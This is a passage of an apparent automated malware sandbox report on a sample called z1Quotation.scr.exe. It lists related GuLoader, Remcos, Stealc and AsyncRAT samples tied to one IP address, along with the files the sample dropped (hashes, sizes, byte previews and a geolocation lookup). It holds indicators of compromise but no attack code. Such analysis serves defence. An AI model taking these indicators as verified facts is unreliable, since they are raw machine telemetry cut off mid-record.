                                                                            Faktura_82666410_1361590461#U00b7pdf.vbeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • 102.65.21.26
                                                                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                            • 102.65.21.26
                                                                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                            • 102.65.21.26
                                                                            SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                            • 102.65.21.26
                                                                            SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                            • 102.65.21.26

                                                                            Dropped Files

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            C:\Users\user\AppData\Local\Temp\nsi8284.tmp\nsExec.dllSOuJyjzbcV.exeGet hashmaliciousGuLoaderBrowse
                                                                              goCj2yHUGx.exeGet hashmaliciousGuLoaderBrowse
                                                                                FcMubiUTN1.exeGet hashmaliciousGuLoaderBrowse
                                                                                  oEijqRFE2K.exeGet hashmaliciousGuLoaderBrowse
                                                                                    SOuJyjzbcV.exeGet hashmaliciousGuLoaderBrowse
                                                                                      goCj2yHUGx.exeGet hashmaliciousGuLoaderBrowse
                                                                                        FcMubiUTN1.exeGet hashmaliciousGuLoaderBrowse
                                                                                          LM1UOHhZYE.exeGet hashmaliciousGuLoaderBrowse
                                                                                            LM1UOHhZYE.exeGet hashmaliciousGuLoaderBrowse
                                                                                              C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dllTeosofis.exeGet hashmaliciousGuLoaderBrowse
                                                                                                Appetisement56.exeGet hashmaliciousGuLoaderBrowse
                                                                                                  Sparkler.exeGet hashmaliciousGuLoaderBrowse
                                                                                                    Revived.exeGet hashmaliciousGuLoaderBrowse
                                                                                                      Graphitoid.exeGet hashmaliciousGuLoaderBrowse
                                                                                                        Teosofis.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          Sparkler.exeGet hashmaliciousGuLoaderBrowse
                                                                                                            Appetisement56.exeGet hashmaliciousGuLoaderBrowse
                                                                                                              Revived.exeGet hashmaliciousGuLoaderBrowse

                                                                                                                Created / dropped Files

                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_z1Quotation.scr._0c583a83ca27c495721c8da0965d5fefb99bec_319e390f_6e567999-aeed-41e3-83e4-b4604fbf4901\Report.wer

                                                                                                                Download File
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):65536
                                                                                                                Entropy (8bit):1.1695842075093994
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:re/rqlnmBUWgj4mlr72jidDu76qfAIO8Kc:q/rqlmBUWgjgGDu76qfAIO8K
                                                                                                                MD5:CE79F6C5972F1565F7D195D9A9094545
                                                                                                                SHA1:D8430EDC267C3EF53A03921CCBB67DC9E54FEBE7
                                                                                                                SHA-256:F575E8C26BBC33D307515EC8F861829AA8A3B0F70325A243C3D49A279004C9EF
                                                                                                                SHA-512:287EF9C16FA7A0C9D183BCC232A88100130CA591DBB554D368B5040D3D37079BCF9A45A6DEDF4A37BD909F7328D76A7346BF91F66F6989863FF48F4EA23A53CB
                                                                                                                Malicious:false
                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.1.6.4.5.6.0.6.8.2.5.9.6.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.1.6.4.5.6.1.0.8.8.7.6.2.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.e.5.6.7.9.9.9.-.a.e.e.d.-.4.1.e.3.-.8.3.e.4.-.b.4.6.0.4.f.b.f.4.9.0.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.2.6.7.7.7.a.8.-.3.4.2.7.-.4.b.f.6.-.9.2.e.8.-.9.a.3.e.b.9.7.e.5.c.1.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.z.1.Q.u.o.t.a.t.i.o.n...s.c.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.8.4.-.0.0.0.1.-.0.0.4.9.-.0.8.6.2.-.6.e.f.1.1.f.1.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.4.6.9.3.d.9.3.8.2.9.e.4.c.e.0.0.9.f.e.7.5.3.2.7.8.d.d.a.9.f.0.0.0.0.0.0.9.0.4.!.0.0.0.0.4.9.a.3.4.b.4.9.6.d.7.8.0.5.4.a.1.b.6.4.0.4.d.d.0.4.d.9.b.e.6.0.d.0.7.1.a.e.5.2.!.z.1.Q.u.o.t.a.t.i.o.n...s.c.r...e.x.e...

                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERE267.tmp.dmp

                                                                                                                Download File
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:Mini DuMP crash report, 14 streams, Mon Sep 30 10:09:20 2024, 0x1205a4 type
                                                                                                                Category:dropped
                                                                                                                Size (bytes):151696
                                                                                                                Entropy (8bit):2.0714496483403995
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:t69l+KepY5qcnvEe0T2HZyUhZvmfb1C/yJv:tkf5nvRHZyUhRmT1C/yJv
                                                                                                                MD5:71F34277AA879BD83574090FF3E16C5D
                                                                                                                SHA1:9CB88D25CF92553E263564439F5E1E9AE4839F5D
                                                                                                                SHA-256:A791DA6AA998DFBE5D9DEA6877C84B0D3A8D4100377A130A32F6EBF9A36DF5E1
                                                                                                                SHA-512:68056036CC4B931125D8736B30035CFBF586CDF08676F64195AE2ED2B6F9E726583FBE1F97069986B19AC5F7A9055EC30A62F6340B21406CADC1FA00A98FAA3F
                                                                                                                Malicious:false
                                                                                                                Preview:MDMP..a..... ........x.f........................X!...............f..........T.......8...........T............[..............d+..........P-..............................................................................bJ.......-......GenuineIntel...........T...........Yw.f#............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERE343.tmp.WERInternalMetadata.xml

                                                                                                                Download File
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):6370
                                                                                                                Entropy (8bit):3.716858816202162
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:R7IU6o7lZt3i6v6IsQwhY7ZLOvzcuujulypaM4Uf89b2fsfrym:R9l7lZNi6v6IsJY7CEprf89b2fsfrym
                                                                                                                MD5:E22BAD4D18646448E4BD849AEE330024
                                                                                                                SHA1:D7339C352F1020BA8A344B68EEE97312118CBC4C
                                                                                                                SHA-256:225C4B563626BF00B21532E005B237AEE057596816BD3E0C4740118F355B4D39
                                                                                                                SHA-512:B57FC3400B59D9D941326A6770CA2A02518D3ADB2FACEF2DA0A954B80DD1AF2A4013815E473BE55CD74BA9A978DFC63129C43CD8EC266740AE05299219025067
                                                                                                                Malicious:false
                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.4.1.2.<./.P.i.

                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERE373.tmp.xml

                                                                                                                Download File
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4764
                                                                                                                Entropy (8bit):4.500211913842631
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:cvIwwtl8zsZe702I7VFJ5WS2Cfjkws3rm8M4JIss5FI+q8sPFc/XuavI7ld:uILfA7GySPfaJryuaQ7ld
                                                                                                                MD5:8A387A9177548592C598AD2727FC52EE
                                                                                                                SHA1:96511B3A863FE8425E2E99A7712F6EDF77C8C02B
                                                                                                                SHA-256:C57F9961E2237AD71ABCF6D8F39A865CB2CFA54938DE8B80AD16BC70CC546D38
                                                                                                                SHA-512:4F70C31EE758ECEC3B03E3DC6C306D5278720118FC4A7C140F8A947799413391D26EA496B8BB996C68F3C3F86BC48E88466BCC8966BA127C6EEFD267B94F8F52
                                                                                                                Malicious:false
                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222866600" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="

                                                                                                                C:\Users\user\AppData\LocalLow\Intel\ShaderCache\55ef227cc1d1c888edc3af337e019091d8c0eafc546d066b0a6a76da081ea88f

                                                                                                                Download File
                                                                                                                Process:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):26
                                                                                                                Entropy (8bit):3.873140679513132
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:tAvnXVG8d:tgXVVd
                                                                                                                MD5:2DE2373EF07261CAC4D4BF7D3FE31122
                                                                                                                SHA1:8A5BD414AFD96AFAED4EB413D033240BC6A71C94
                                                                                                                SHA-256:F6F219ED2C4029EBC3071C036B64113AA62A7A342D2FD5965FD122D5C90BC9BC
                                                                                                                SHA-512:AF4CACDD0A501DCB37318FA9E5B7049AFEB8E0EE6EB0770F0B013C70E32123FA45C1508DD12921C909C0C9F88AC8A2F3041A16747E5FF145B4FB15E8509DB105
                                                                                                                Malicious:false
                                                                                                                Preview:INSC.>.....Mar222021150038

                                                                                                                C:\Users\user\AppData\LocalLow\Intel\ShaderCache\57bf52f84f9bbfff2af5f5bd73dee023aeb97bd173672fd615cdf006f13c5099

                                                                                                                Download File
                                                                                                                Process:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):26
                                                                                                                Entropy (8bit):3.873140679513132
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:tAvnXVG8d:tgXVVd
                                                                                                                MD5:2DE2373EF07261CAC4D4BF7D3FE31122
                                                                                                                SHA1:8A5BD414AFD96AFAED4EB413D033240BC6A71C94
                                                                                                                SHA-256:F6F219ED2C4029EBC3071C036B64113AA62A7A342D2FD5965FD122D5C90BC9BC
                                                                                                                SHA-512:AF4CACDD0A501DCB37318FA9E5B7049AFEB8E0EE6EB0770F0B013C70E32123FA45C1508DD12921C909C0C9F88AC8A2F3041A16747E5FF145B4FB15E8509DB105
                                                                                                                Malicious:false
                                                                                                                Preview:INSC.>.....Mar222021150038

                                                                                                                C:\Users\user\AppData\Local\D3DSCache\c6e1bc7b336e2cfe\6F75932F-7DFC-4FB0-B4B8-12DE1AC415DA_VEN_8086&DEV_3E98&SUBSYS_3E98&REV_2.idx

                                                                                                                Download File
                                                                                                                Process:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):65552
                                                                                                                Entropy (8bit):0.02052824266090763
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:n9llGlll/l/lXp9ZjrPBYf8Pc1yllzSlld+k5l+jLtdll:n9l0dPBYf8PD5S/d+k5l+H
                                                                                                                MD5:EEAD976AD287EEB54A4C3D5265AAB5DF
                                                                                                                SHA1:0EB6B00B9E9C61EFB0AB8F09CED725EFD2828F14
                                                                                                                SHA-256:9F05FF8A8E6BCC728ABBF15D5C2923E5202720054C054FAD44CB1F65FD074B2C
                                                                                                                SHA-512:C0EC55E85389AA8443D1E977E44DAC51F83D20F33524935D47520AD685AD0EFC552B5F536B22060D62AB7B5E8B0DC67BABF3DF55214A32AAED7240651803B6FB
                                                                                                                Malicious:false
                                                                                                                Preview:>..#........................................f...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                C:\Users\user\AppData\Local\D3DSCache\c6e1bc7b336e2cfe\6F75932F-7DFC-4FB0-B4B8-12DE1AC415DA_VEN_8086&DEV_3E98&SUBSYS_3E98&REV_2.lock

                                                                                                                Download File
                                                                                                                Process:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4
                                                                                                                Entropy (8bit):1.5
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:R:R
                                                                                                                MD5:F49655F856ACB8884CC0ACE29216F511
                                                                                                                SHA1:CB0F1F87EC0455EC349AAA950C600475AC7B7B6B
                                                                                                                SHA-256:7852FCE59C67DDF1D6B8B997EAA1ADFAC004A9F3A91C37295DE9223674011FBA
                                                                                                                SHA-512:599E93D25B174524495ED29653052B3590133096404873318F05FD68F4C9A5C9A3B30574551141FBB73D7329D6BE342699A17F3AE84554BAB784776DFDA2D5F8
                                                                                                                Malicious:false
                                                                                                                Preview:EERF

                                                                                                                C:\Users\user\AppData\Local\D3DSCache\c6e1bc7b336e2cfe\6F75932F-7DFC-4FB0-B4B8-12DE1AC415DA_VEN_8086&DEV_3E98&SUBSYS_3E98&REV_2.val

                                                                                                                Download File
                                                                                                                Process:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                                File Type:Matlab v4 mat-file (little endian) (, numeric, rows 0, columns 16, imaginary
                                                                                                                Category:dropped
                                                                                                                Size (bytes):65536
                                                                                                                Entropy (8bit):0.06375376003383355
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:VS+UN+G28ntY7J7BfS/lBZXUGlaVPDFcChs:E+s+GEB0BZXUG+l
                                                                                                                MD5:28B017A8A053F5497D60F0385437892A
                                                                                                                SHA1:458B75C59381B2C5663F67F0503DE7E72C164528
                                                                                                                SHA-256:8BF8273CBF916B43E0B0954242D1CDB618FE6A2B906D6FF7E7817B01607A308B
                                                                                                                SHA-512:4EDBDEF2C1D17EBD92C450073042931CBFD4C54C97CAE5D191D71E9CE1827A3B40CE6E8CBBF4766914E8B403489A803E638EA7270B8130B8989F588B55D68863
                                                                                                                Malicious:false
                                                                                                                Preview:................>...(....x:no.&A.e.u~+..C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.d.x.d.i.a.g...e.x.e.................................(...p.DJ!.IL.....Z...,.%...................>..I....>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...$.jz... ........................

                                                                                                                C:\Users\user\AppData\Local\D3DSCache\c6e1bc7b336e2cfe\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

                                                                                                                Download File
                                                                                                                Process:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):65552
                                                                                                                Entropy (8bit):0.01237149505889543
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:N+/lGlll/l/lXp9ZjrPBY06llcllXwiEl/lRP:m0dPBY0O6/giEXJ
                                                                                                                MD5:27754E2DB48BC95315A62B86FD981E5A
                                                                                                                SHA1:1568ECDB144BE9F8DBC488BC4944D89E31058EA5
                                                                                                                SHA-256:84560889FB3E1F4E9F6302D1A73D62C85E0F7544DCC1255328B8643A0BFCCA09
                                                                                                                SHA-512:FC8BF7FE7489942015F32F2D93DE1B3F3A07E08AAEBC872E89E5C9C20A21449D9BB7E4576695C6C81411BDABD9A96F658F6CD4A1CC502D7045B9DB8568C422F1
                                                                                                                Malicious:false
                                                                                                                Preview:..uA........................................f...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                C:\Users\user\AppData\Local\D3DSCache\c6e1bc7b336e2cfe\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

                                                                                                                Download File
                                                                                                                Process:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4
                                                                                                                Entropy (8bit):1.5
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:R:R
                                                                                                                MD5:F49655F856ACB8884CC0ACE29216F511
                                                                                                                SHA1:CB0F1F87EC0455EC349AAA950C600475AC7B7B6B
                                                                                                                SHA-256:7852FCE59C67DDF1D6B8B997EAA1ADFAC004A9F3A91C37295DE9223674011FBA
                                                                                                                SHA-512:599E93D25B174524495ED29653052B3590133096404873318F05FD68F4C9A5C9A3B30574551141FBB73D7329D6BE342699A17F3AE84554BAB784776DFDA2D5F8
                                                                                                                Malicious:false
                                                                                                                Preview:EERF

                                                                                                                C:\Users\user\AppData\Local\D3DSCache\c6e1bc7b336e2cfe\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

                                                                                                                Download File
                                                                                                                Process:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                                File Type:Matlab v4 mat-file (little endian) (, numeric, rows 0, columns 16, imaginary
                                                                                                                Category:dropped
                                                                                                                Size (bytes):65536
                                                                                                                Entropy (8bit):0.020296169267305913
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:9llpl5d2DJqojBdl+Sli5l2GkNl0lR9TNlktt/llaia9sVQMm4qNw:c9q0Bn+SkyGkNlUetb2Hsqi
                                                                                                                MD5:AE2B45690B7A2B278AD387D9AB374E16
                                                                                                                SHA1:1822D3444AF5A00E882B9D1483CCE518FF57FD09
                                                                                                                SHA-256:F617DFE9D4C2FE77DC462523FF803A1C7D9E23E014D63F64D2202DFC519BFEE7
                                                                                                                SHA-512:36D490650F9FB4280A83B9869F54C8C4B2AA317652397726107B44AF344E377118A6306DE71BC2D4DE012CDDD8E8A7C157F6164D619F315D264841E36137A01D
                                                                                                                Malicious:false
                                                                                                                Preview:................>...(....x:no.&A.e.u~+..C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.d.x.d.i.a.g...e.x.e.................................(...p.DJ!.IL.....Z.F.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\json[1].json

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:JSON data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):961
                                                                                                                Entropy (8bit):5.012221362906051
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:tkE9nd6CsGkMyGWKyGXPVGArwY3TogmayHnmGcArpv/mOAaNO+ao9W7iN5zzkw7+:qCdRNuKyGX85JvXhNlT3/7SxDWro
                                                                                                                MD5:EA373E330F778B107A9B569572AF73AA
                                                                                                                SHA1:E421663E5B49D72359FF2679546DE6C706198B5D
                                                                                                                SHA-256:B1C86516741332A761D2B4FBF2886F436F1F4AB983BCC2C92079731DCF5104F1
                                                                                                                SHA-512:D433FDD154DBC467A0BBEF532F1020694EB6DC38A0020F751D4630DC8A24D39578ED13CA7B035BCC06B52BA85E347580A2776616C396E360C238445F06EF9AE6
                                                                                                                Malicious:false
                                                                                                                Preview:{. "geoplugin_request":"102.129.152.223",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Miami",. "geoplugin_region":"Florida",. "geoplugin_regionCode":"FL",. "geoplugin_regionName":"Florida",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"528",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"25.7689",. "geoplugin_longitude":"-80.1946",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                                C:\Users\user\AppData\Local\Temp\azdzamjeqinayzgxunqjk

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2
                                                                                                                Entropy (8bit):1.0
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Qn:Qn
                                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                Malicious:false
                                                                                                                Preview:..

                                                                                                                C:\Users\user\AppData\Local\Temp\bhv73BF.tmp

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x96dfe6b7, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                Category:dropped
                                                                                                                Size (bytes):41943040
                                                                                                                Entropy (8bit):1.4150609084792243
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:y4z7C4CtPp9MkGMdlGyfAmVnPDQgGE7g9jokoiGsH718Cu2b0lfoBg:1Cr9ldlGyfnPDQgG5bu2
                                                                                                                MD5:E63B481E126C85F7B9C1F070D926D382
                                                                                                                SHA1:4D5066533A3F3BDE751C918E6E790BD7DC03DBEB
                                                                                                                SHA-256:BB24253D09050476EED970A954EC087165E07027D75EDB3F0E903B83305A2B60
                                                                                                                SHA-512:41D88CC5E7E7C293771A2179B74E62543F5A23E61B2C71AFCEBBABD00D69D43CE5C9B9636E1C0525E1DDC41B5BFE17BEA9B88397CFC2199E70595105B84C3B8D
                                                                                                                Malicious:false
                                                                                                                Preview:...... ........H...........*...y........................~.K...1....|..;....|..h...L.........................Be ....y7.........................................................................................................bJ......n...............................................................L...L....................................... .......1....|..............................................................L...........................................................................................................................N...:....y!................................._...;....|.X.................F..;....|..................L........#......h...L...................................................................................................................................................................................................................................................................................................................................................

                                                                                                                C:\Users\user\AppData\Local\Temp\bhvB84A.tmp

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x96dfe6b7, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                Category:dropped
                                                                                                                Size (bytes):41943040
                                                                                                                Entropy (8bit):1.4150609084792243
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:y4z7C4CtPp9MkGMdlGyfAmVnPDQgGE7g9jokoiGsH718Cu2b0lfoBg:1Cr9ldlGyfnPDQgG5bu2
                                                                                                                MD5:E63B481E126C85F7B9C1F070D926D382
                                                                                                                SHA1:4D5066533A3F3BDE751C918E6E790BD7DC03DBEB
                                                                                                                SHA-256:BB24253D09050476EED970A954EC087165E07027D75EDB3F0E903B83305A2B60
                                                                                                                SHA-512:41D88CC5E7E7C293771A2179B74E62543F5A23E61B2C71AFCEBBABD00D69D43CE5C9B9636E1C0525E1DDC41B5BFE17BEA9B88397CFC2199E70595105B84C3B8D
                                                                                                                Malicious:false
                                                                                                                Preview:...... ........H...........*...y........................~.K...1....|..;....|..h...L.........................Be ....y7.........................................................................................................bJ......n...............................................................L...L....................................... .......1....|..............................................................L...........................................................................................................................N...:....y!................................._...;....|.X.................F..;....|..................L........#......h...L...................................................................................................................................................................................................................................................................................................................................................

                                                                                                                C:\Users\user\AppData\Local\Temp\bhvF803.tmp

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x96dfe6b7, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                Category:dropped
                                                                                                                Size (bytes):41943040
                                                                                                                Entropy (8bit):1.4150609084792243
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:y4z7C4CtPp9MkGMdlGyfAmVnPDQgGE7g9jokoiGsH718Cu2b0lfoBg:1Cr9ldlGyfnPDQgG5bu2
                                                                                                                MD5:E63B481E126C85F7B9C1F070D926D382
                                                                                                                SHA1:4D5066533A3F3BDE751C918E6E790BD7DC03DBEB
                                                                                                                SHA-256:BB24253D09050476EED970A954EC087165E07027D75EDB3F0E903B83305A2B60
                                                                                                                SHA-512:41D88CC5E7E7C293771A2179B74E62543F5A23E61B2C71AFCEBBABD00D69D43CE5C9B9636E1C0525E1DDC41B5BFE17BEA9B88397CFC2199E70595105B84C3B8D
                                                                                                                Malicious:false
                                                                                                                Preview:...... ........H...........*...y........................~.K...1....|..;....|..h...L.........................Be ....y7.........................................................................................................bJ......n...............................................................L...L....................................... .......1....|..............................................................L...........................................................................................................................N...:....y!................................._...;....|.X.................F..;....|..................L........#......h...L...................................................................................................................................................................................................................................................................................................................................................

                                                                                                                C:\Users\user\AppData\Local\Temp\jcokhfyxinncnfcgtxknzv

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2
                                                                                                                Entropy (8bit):1.0
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
                                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                Malicious:false
                                                                                                                Preview:..

                                                                                                                C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):12288
                                                                                                                Entropy (8bit):5.745485478359495
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
